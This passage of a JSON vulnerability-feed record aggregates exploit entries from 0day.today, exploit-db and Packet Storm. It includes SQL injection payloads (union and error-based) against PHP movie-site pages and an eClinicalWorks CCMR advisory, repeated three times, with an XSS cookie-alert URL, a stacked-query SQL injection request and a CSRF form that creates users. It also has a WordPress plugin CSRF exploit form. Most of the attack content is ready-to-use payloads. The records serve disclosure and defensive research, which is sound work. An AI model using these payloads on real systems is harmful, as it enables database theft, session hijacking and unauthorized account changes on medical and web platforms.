Injection\r\nVulnerable URL:http://localhost/[PATH]/show_misc_video.php\r\nVulnerable Parameters: id\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\r\n-----------------------------------------------\r\n \r\nType:Union Query Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/movie.php\r\nVulnerable Parameters: f\r\nMethod: GET\r\nPayload: -4594 UNION ALL SELECT\r\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n-----------------------------------------------\r\nType: Union Query Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/artist-display.php\r\nVulnerable Parameters: act\r\nMethod: GET\r\nPayload: UNION ALL SELECT\r\nNULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n-----------------------------------------------\r\n \r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/film-rating.php\r\nVulnerable Parameters: v\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26798"}, {"lastseen": "2018-01-05T15:26:49", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "id": "1337DAY-ID-24887", "href": "https://0day.today/exploit/description/24887", "type": "zdt", "title": "eClinicalWorks (CCMR) - Multiple Vulnerabilities", "sourceData": "# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities\r\n# Vendor: https://www.eclinicalworks.com\r\n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \r\n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/\r\n# Credit: Jerold Hoong\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4591 CROSS-SITE SCRIPTING\r\nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary javascript via the strMessage parameter.\r\n \r\nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=\r\n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4592 SQL INJECTION\r\nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary malicious database commands as part of user input.\r\n \r\nParameter: uemail (POST PARAMETER)\r\nType: stacked queries\r\nTitle: Microsoft SQL Server/Sybase stacked queries (comment)\r\nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&[email\u00a0protected]';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n \r\nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1\r\nHost: 127.0.0.1:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp\r\nContent-Length: 186\r\n[SNIP] ...\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[SNIP] ...\r\n \r\naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&[email\u00a0protected]';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY\r\nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \r\nClient Portal allows remote attackers to hijack the authentication of content administrators\r\nfor requests that could lead to the creation, modification and deletion of users, appointments\r\nand employees.\r\n \r\n# ADDING OF USER\r\n<html>\r\n <body>\r\n <form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"action\" value=\"add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"0\" />\r\n <input type=\"hidden\" name=\"createdOver\" value=\"1\" />\r\n <input type=\"hidden\" name=\"ufname\" value=\"John\" />\r\n <input type=\"hidden\" name=\"ulname\" value=\"Doe\" />\r\n <input type=\"hidden\" name=\"uminitial\" value=\"\" />\r\n <input type=\"hidden\" name=\"selUserType\" value=\"1\" />\r\n <input type=\"hidden\" name=\"status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"upaddress\" value=\"\" />\r\n <input type=\"hidden\" name=\"upcity\" value=\"\" />\r\n <input type=\"hidden\" name=\"upstate\" value=\"\" />\r\n <input type=\"hidden\" name=\"zipcode\" value=\"\" />\r\n <input type=\"hidden\" name=\"uemail\" value=\"[email\u00a0protected]\" />\r\n <input type=\"hidden\" name=\"upphone\" value=\"98999299\" />\r\n <input type=\"hidden\" name=\"umobileno\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4594 SESSION FIXATION\r\nThe web application is vulnerable to session fixation attacks. When authenticating a user\r\nthe application does not assign a new session ID, making it possible to use an existent\r\nsession ID.\r\n \r\n-------------------------------------\r\n \r\n# TIMELINE\r\n\u2013 16/06/2015: Vulnerability found\r\n\u2013 16/06/2015: Vendor informed\r\n\u2013 16/06/2015: Request for CVE IDs\r\n- 16/06/2015: MITRE issued CVE numbers\r\n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc\r\n- 21/06/2015: No support contract, vendor does not open case\r\n- 22/06/2015: Requested update from vendor, no response\r\n- 01/07/2015: Contacted vendor again, vendor requested for support contract again\r\n- 02/07/2015: No support contract, no response from vendor\r\n\u2013 31/01/2016: Public disclosure\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24887"}, {"lastseen": "2018-04-13T05:42:53", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-01-29T00:00:00", "published": "2016-01-29T00:00:00", "id": "1337DAY-ID-24882", "href": "https://0day.today/exploit/description/24882", "type": "zdt", "title": "WordPress Simple Add Pages or Posts 1.6 Plugin - Cross-Site Request Forgery", "sourceData": "########################################################################\r\n# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability\r\n# Date: 2016/29/01\r\n# Exploit Author: ALIREZA_PROMIS\r\n# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/\r\n# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip\r\n# Version: 1.6\r\n# Tested on: ubuntu / FireFox\r\n########################################################################\r\n \r\n[Exploitation]\r\nhttps://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29\r\n \r\n[HTML CODE ]\r\n<form id=\"form1\" name=\"form1\" method=\"post\" action=\"http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php\"\r\n<select name=\"postorpage\">\r\n<option value=\"page\">Page</option>\r\n<option value=\"post\">Post</option>\r\n</select>\r\n<td colspan=\"2\"><select name='post_parent' id='post_parent'>\r\n<option value=\"\">No, do not use parent</option>\r\n<option class=\"level-0\" value=\"2\">Sample Page</option>\r\n</select>\r\n<tr class=\"alternate iedit\">\r\n<textarea name=\"titles\" rows=\"1\" cols=\"30\"></textarea>\r\n<tr class=\"iedit\">\r\n<td colspan=\"2\"><select name=\"author_id\">\r\n<option value=\"1\">admin</option></select>\r\n<input type=\"submit\" name=\"submitbutton\" value=\"Add\" class=\"button-primary\"></form>\r\n \r\n \r\n \r\nand live POST request :\r\npostorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add\r\n \r\n \r\n########################################################################\r\n# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r\r\n# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk\r\n#\r\n# [+] fb.com/alirezapomis.blackhat\r\n########################################################################\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24882"}], "cve": [{"lastseen": "2019-03-14T11:10:22", "bulletinFamily": "NVD", "description": "eClinicalWorks Population Health (CCMR) suffers from a session fixation vulnerability. When authenticating a user, the application does not assign a new session ID, making it possible to use an existent session ID.", "modified": "2019-03-13T14:59:24", "published": "2017-01-10T10:59:00", "id": "CVE-2015-4594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4594", "title": "CVE-2015-4594", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T10:03:03", "bulletinFamily": "exploit", "description": "eClinicalWorks (CCMR) - Multiple Vulnerabilities. CVE-2015-4591,CVE-2015-4592,CVE-2015-4593,CVE-2015-4594. Webapps exploit for jsp platform", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "id": "EDB-ID:39402", "href": "https://www.exploit-db.com/exploits/39402/", "type": "exploitdb", "title": "eClinicalWorks CCMR - Multiple Vulnerabilities", "sourceData": "# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities\r\n# Vendor: https://www.eclinicalworks.com\r\n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \r\n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/\r\n# Credit: Jerold Hoong\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4591 CROSS-SITE SCRIPTING\r\nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary javascript via the strMessage parameter.\r\n\r\nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=\r\n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4592 SQL INJECTION\r\nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary malicious database commands as part of user input.\r\n\r\nParameter: uemail (POST PARAMETER)\r\nType: stacked queries\r\nTitle: Microsoft SQL Server/Sybase stacked queries (comment)\r\nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n\r\nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1\r\nHost: 127.0.0.1:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp\r\nContent-Length: 186\r\n[SNIP] ...\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[SNIP] ...\r\n\r\naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY\r\nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \r\nClient Portal allows remote attackers to hijack the authentication of content administrators\r\nfor requests that could lead to the creation, modification and deletion of users, appointments\r\nand employees.\r\n\r\n# ADDING OF USER\r\n<html>\r\n <body>\r\n <form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"action\" value=\"add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"0\" />\r\n <input type=\"hidden\" name=\"createdOver\" value=\"1\" />\r\n <input type=\"hidden\" name=\"ufname\" value=\"John\" />\r\n <input type=\"hidden\" name=\"ulname\" value=\"Doe\" />\r\n <input type=\"hidden\" name=\"uminitial\" value=\"\" />\r\n <input type=\"hidden\" name=\"selUserType\" value=\"1\" />\r\n <input type=\"hidden\" name=\"status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"upaddress\" value=\"\" />\r\n <input type=\"hidden\" name=\"upcity\" value=\"\" />\r\n <input type=\"hidden\" name=\"upstate\" value=\"\" />\r\n <input type=\"hidden\" name=\"zipcode\" value=\"\" />\r\n <input type=\"hidden\" name=\"uemail\" value=\"johndoe@test.com.de\" />\r\n <input type=\"hidden\" name=\"upphone\" value=\"98999299\" />\r\n <input type=\"hidden\" name=\"umobileno\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4594 SESSION FIXATION\r\nThe web application is vulnerable to session fixation attacks. When authenticating a user\r\nthe application does not assign a new session ID, making it possible to use an existent\r\nsession ID.\r\n\r\n-------------------------------------\r\n\r\n# TIMELINE\r\n\u2013 16/06/2015: Vulnerability found\r\n\u2013 16/06/2015: Vendor informed\r\n\u2013 16/06/2015: Request for CVE IDs\r\n- 16/06/2015: MITRE issued CVE numbers\r\n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc\r\n- 21/06/2015: No support contract, vendor does not open case\r\n- 22/06/2015: Requested update from vendor, no response\r\n- 01/07/2015: Contacted vendor again, vendor requested for support contract again\r\n- 02/07/2015: No support contract, no response from vendor\r\n\u2013 31/01/2016: Public disclosure", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39402/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:58", "bulletinFamily": "exploit", "description": "", "modified": "2016-02-01T00:00:00", "published": "2016-02-01T00:00:00", "href": "https://packetstormsecurity.com/files/135533/eClinicalWorks-Population-Health-CCMR-SQL-Injection-CSRF-XSS.html", "id": "PACKETSTORM:135533", "title": "eClinicalWorks Population Health (CCMR) SQL Injection / CSRF / XSS", "type": "packetstorm", "sourceData": "`# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities \n# Vendor: https://www.eclinicalworks.com \n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/ \n# Credit: Jerold Hoong \n \n------------------------------------- \n \n# CVE-2015-4591 CROSS-SITE SCRIPTING \nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population \nHealth (CCMR) Client Portal Software allows remote authenticated users to inject \narbitrary javascript via the strMessage parameter. \n \nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage= \n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E \n \n------------------------------------- \n \n# CVE-2015-4592 SQL INJECTION \nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population \nHealth (CCMR) Client Portal Software allows remote authenticated users to inject \narbitrary malicious database commands as part of user input. \n \nParameter: uemail (POST PARAMETER) \nType: stacked queries \nTitle: Microsoft SQL Server/Sybase stacked queries (comment) \nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate= \n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno= \n \nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1 \nHost: 127.0.0.1:443 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nX-Requested-With: XMLHttpRequest \nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp \nContent-Length: 186 \n[SNIP] ... \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n[SNIP] ... \n \naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate= \n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno= \n \n------------------------------------- \n \n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY \nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \nClient Portal allows remote attackers to hijack the authentication of content administrators \nfor requests that could lead to the creation, modification and deletion of users, appointments \nand employees. \n \n# ADDING OF USER \n<html> \n<body> \n<form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\"> \n<input type=\"hidden\" name=\"action\" value=\"add\" /> \n<input type=\"hidden\" name=\"uid\" value=\"0\" /> \n<input type=\"hidden\" name=\"createdOver\" value=\"1\" /> \n<input type=\"hidden\" name=\"ufname\" value=\"John\" /> \n<input type=\"hidden\" name=\"ulname\" value=\"Doe\" /> \n<input type=\"hidden\" name=\"uminitial\" value=\"\" /> \n<input type=\"hidden\" name=\"selUserType\" value=\"1\" /> \n<input type=\"hidden\" name=\"status\" value=\"0\" /> \n<input type=\"hidden\" name=\"upaddress\" value=\"\" /> \n<input type=\"hidden\" name=\"upcity\" value=\"\" /> \n<input type=\"hidden\" name=\"upstate\" value=\"\" /> \n<input type=\"hidden\" name=\"zipcode\" value=\"\" /> \n<input type=\"hidden\" name=\"uemail\" value=\"johndoe@test.com.de\" /> \n<input type=\"hidden\" name=\"upphone\" value=\"98999299\" /> \n<input type=\"hidden\" name=\"umobileno\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n------------------------------------- \n \n# CVE-2015-4594 SESSION FIXATION \nThe web application is vulnerable to session fixation attacks. When authenticating a user \nthe application does not assign a new session ID, making it possible to use an existent \nsession ID. \n \n------------------------------------- \n \n# TIMELINE \n\u0096 16/06/2015: Vulnerability found \n\u0096 16/06/2015: Vendor informed \n\u0096 16/06/2015: Request for CVE IDs \n- 16/06/2015: MITRE issued CVE numbers \n\u0096 16/06/2015: Vendor responded requesting more information on support contract etc \n- 21/06/2015: No support contract, vendor does not open case \n- 22/06/2015: Requested update from vendor, no response \n- 01/07/2015: Contacted vendor again, vendor requested for support contract again \n- 02/07/2015: No support contract, no response from vendor \n\u0096 31/01/2016: Public disclosure \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/135533/eclinicalworks-sqlxssxsrfsf.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}